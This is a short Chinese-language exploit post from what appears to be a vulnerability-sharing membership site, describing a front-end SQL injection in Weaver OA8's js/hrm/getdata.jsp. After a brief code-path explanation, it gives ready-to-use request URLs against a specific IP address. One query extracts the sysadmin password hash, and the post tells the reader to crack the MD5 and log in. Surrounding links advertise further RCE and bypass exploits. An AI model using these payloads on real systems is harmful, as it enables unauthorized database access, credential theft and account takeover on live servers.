泛微OA8_前台SQL注入漏洞_zh-hant

030

# 泛微OA8 前台SQL注入漏洞/zh-hant

==注入點==

http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=***

getdata.jsp中,直接將request對象交給

weaver.hrm.common.AjaxManager.getData(HttpServletRequest,ServletContext) :

方法處理

在getData方法中,判斷請求裡cmd參數是否為空,如果不為空,調用proc方法

Proc方法4個參數,(“空字符串”,”cmd參數值”,request對象,serverContext對象)

在proc方法中,對cmd參數值進行判斷,當cmd值等於getSelectAllId時,再從請求中獲取sql和type兩個參數值,並將參數傳遞進getSelectAllIds(sql,type)方法中

getSelectAllIds(sql,type)方法中,直接將sql參數的值,傳遞進數據庫執行,並判斷type的值是否等於5,如果等於5,獲取查詢結果的requestId字段,否則獲取查詢結果的id字段

到此,參數從URL,一直到數據庫被執行

根據以上代碼流程,只要構造請求參數
?cmd= getSelectAllId&sql=selectpassword as id from userinfo;
即可完成對數據庫操控
在瀏覽器中,構造測試URL:
http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id
頁面顯示1234

==Payload==

Select password as id from HrmResourceManager

 

http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
查詢HrmResourceManager表中的password字段,頁面中返回了數據庫第一條記錄的值(sysadmin用戶的password)
解密MD5登入系統。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
国内漏洞库
喜欢就支持一下吧
点赞0 分享
棉花糖的头像-棉花糖会员站年费会员
会员必看手册(20250530版本)增加某会员文章搜索阅读-棉花糖会员站
会员必看手册(20250530版本)增加某会员文章搜索阅读
会员必看手册(20250530版本)增加某会员文章搜索阅读
2025年5月30日 2.8W+
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
2025年7月3日 9480
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
2024年12月17日 7017
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
2024年3月25日 4451
已开奖!国庆抽奖,猫咪赞助安全课程300份-棉花糖会员站
已开奖!国庆抽奖,猫咪赞助安全课程300份
已开奖!国庆抽奖,猫咪赞助安全课程300份
2024年9月29日 3165
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
2024年6月8日 3162
相关推荐
金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站
金蝶EAS autoLogin.jsp远程代码执行
金蝶EAS autoLogin.jsp远程代码执行
2025年7月4日 1479
AgentSyste代理商管理系统 login.action Struts2 远程代码执行-棉花糖会员站
AgentSyste代理商管理系统 login.action Struts2 远程代码执行
AgentSyste代理商管理系统 login.action Struts2 远程代码执行
2025年7月1日 1375
海康威视漏洞合集-棉花糖会员站
海康威视漏洞合集
海康威视漏洞合集
2024年6月1日 1311
NIPS 绿盟网络入侵防护系统敏感信息泄漏-棉花糖会员站
NIPS 绿盟网络入侵防护系统敏感信息泄漏
NIPS 绿盟网络入侵防护系统敏感信息泄漏
2025年6月24日 1186
泛微OA E-cology /mobile/plugin/plugin.xml 存在未授权访问-棉花糖会员站
泛微OA E-cology /mobile/plugin/plugin.xml 存在未授权访问
泛微OA E-cology /mobile/plugin/plugin.xml 存在未授权访问
2025年6月17日 1138
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行-棉花糖会员站
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
2025年7月4日 1127
评论 抢沙发

请登录后发表评论

    暂无评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站年费会员
泛微E-cology js/hrm/getdata.jsp SQL注入
泛微E-Cology登录绕过
汉王e脸通综合管理平台 wxLogin.do 存在敏感信息泄露
用友u9 cloud 存在文件读取
Redis hyperloglog 远程代码执行(CVE-2025-32023)
Richmail 邮件系统 openapiservice 存在任意文件上传
最近一周热门文章

1mingdon 明动 burp插件0.2.6版本 本地时间校验去除版

棉花糖的头像-棉花糖会员站年费会员2025年7月3日
9480

2金蝶EAS autoLogin.jsp远程代码执行

棉花糖的头像-棉花糖会员站年费会员2025年7月4日
1479

3爱数AnyShare智能内容管理平台 start_service 存在远程命令执行

棉花糖的头像-棉花糖会员站年费会员2025年7月4日
1127

4深信服运维安全管理系统 RCE

棉花糖的头像-棉花糖会员站年费会员2025年7月6日
919

5美特CRM存在druid未授权访问

棉花糖的头像-棉花糖会员站年费会员2025年7月6日
846

6Redis hyperloglog 远程代码执行(CVE-2025-32023)

棉花糖的头像-棉花糖会员站年费会员2025年7月8日
9999787
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密